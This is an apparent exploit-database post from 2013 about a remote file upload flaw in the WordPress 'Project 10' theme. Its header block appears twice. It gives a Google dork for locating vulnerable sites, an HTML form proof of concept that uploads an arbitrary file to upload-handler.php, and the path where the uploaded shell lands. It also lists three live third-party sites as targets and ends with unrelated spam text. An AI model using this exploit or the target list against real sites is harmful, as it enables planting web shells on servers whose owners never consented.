###############################################################
# Exploit Title : WordPress Project 10 Themes - Remote File Upload Vulnerability
# Author : Byakuya
# Date : 11/18/2013
# Vendor Homepage : http://themeforest.net/
# Themes Link : http://themeforest.net/item/project-10-magazine-theme/2513938
# Affected Version : v1.0
# Infected File : upload-handler.php
# Category : webapps/php
# Google dork : inurl:/wp-content/themes/project10-theme/
# Tested on : Windows/Linux
###############################################################
# Exploit Title : WordPress Project 10 Themes - Remote File Upload Vulnerability
# Author : Byakuya
# Date : 11/18/2013
# Vendor Homepage : http://themeforest.net/
# Themes Link : http://themeforest.net/item/project-10-magazine-theme/2513938
# Affected Version : v1.0
# Infected File : upload-handler.php
# Category : webapps/php
# Google dork : inurl:/wp-content/themes/project10-theme/
# Tested on : Windows/Linux
###############################################################
# Exploit & POC :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/project10-theme/functions/upload-handler.php"
method="post">
Please choose a file: <input name="orange_themes" type="file" /><br />
<input type="submit" value="upload" />
</form>
# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php
# Live Site:
-http://givethekXids.gr/give_v2/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ba7Xar.org/wp-content/themes/project10-theme//functions/upload-handler.php
-http://www.ineeXdamilliondollars.com/wp-content/themes/project10-theme/functions/upload-handler.php
# Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./MrN3wb1e ./Official Code-Newbie
I like this you can also see oh
wordpress business themes